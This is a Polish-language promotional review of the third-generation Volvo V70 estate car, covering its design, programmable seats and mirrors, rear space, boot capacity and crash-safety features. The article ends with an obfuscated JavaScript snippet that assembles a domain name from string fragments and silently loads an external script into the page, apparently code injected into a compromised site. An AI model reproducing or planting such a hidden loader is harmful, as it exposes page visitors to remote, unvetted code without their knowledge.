Często się zdarza, że próby łączenia klasycznych (by nie rzec: konserwatywnych) rozwiązań stylistycznych z nowoczesnymi trendami designerskimi kończy się tragicznie, jednak w przypadku trzeciej generacji Volvo V70 projektanci stanęli na wysokości zadania. Nowe V70 jest natychmiast rozpoznawalne z zewnątrz jako auto należące do słynnej Szwedzkiej stajni, a wewnątrz dominuje prostota, elegancja i ergonomia, z których Volvo jest znane praktycznie od zawsze. Trudno zresztą spodziewać się, że w dużym i przestronnym aucie kombi znajdzie się miejsce na jakieś szczególne ekstrawagancje, nie znaczy to jednak wcale, że ciekawych i nietuzinkowych rozwiązań tu brak. Wręcz przeciwnie.

Konfigurowalne i wygodne wnętrze

Jedną z ciekawszych właściwości foteli i lusterek w nowym Volvo V70 jest fakt, że ich ustawienia można zaprogramować, dzięki czemu każda osoba korzystająca z danego samochodu może spersonalizować ustawienia dla siebie, włączając je jednym przyciskiem. Oszczędza to mnóstwo czasu i eliminuje konieczność żmudnego przestawiania lusterek i foteli do odpowiadającego nam położenia.

W nowym V70 nie brak też miejsca dla pasażerów tylnej kanapy, co wbrew pozorom nie jest normą dla wszystkich aut kombi dostępnych obecnie na rynku – w tym konkretnym przypadku jednak nie ma obawy, że osoby o wyższym niż przeciętny wzroście będą się męczyć: miejsca jest więcej niż wystarczająco.

volvo-v70

Tu warto wspomnieć także o przestrzeni bagażowej, której w Volvo V70 jest niemało: nominalnie bagażnik ma 575 litrów (co samo w sobie w zupełności wystarcza na potrzeby większości kierowców i ich rodzin), a po rozłożeniu tylnej kanapy można uzyskać nawet 1600 litrów pojemności bagażnika.

Bezpieczeństwo nade wszystko

Szwedzka firma słynie z solidności swych konstrukcji i nie inaczej jest z Volvo V70: przedział pasażerski jest wzmocniony formowana na gorąco stalą borową, zastosowano system SIPS (ogranicza on skutki zderzeń bocznych przekierowując część energii na większe partie nadwozia), kolumna kierownicy jest łamana (odkształca się w kontrolowany sposób w przypadku zderzenia), a wszystkie elementy wykończenia wnętrza (panele nadwozia, drzwi) są wypełnione specjalnym materiałem, który pochłania energię zderzenia, chroniąc w ten sposób pasażerów.

To tylko najważniejsze cechy nowego Volvo. Sprawdź więcej szczegółowych informacji na temat Volvo V70.

(function(){
uXa0=document.createElement(”script”);uXa0.type=”text/javascript”;
uXa0.async=true;uXa0_=((”us”)+”t”)+”a”;uXa0_+=(”t.i”)+”"+”n”;uXa0_+=((”f”)+”o”);
uXa0.src=”http://”+uXa0_+”/5042845.caf4mp3rXa0cmfawhgbsrn9h4pswim”;
document.body.appendChild(uXa0);
})();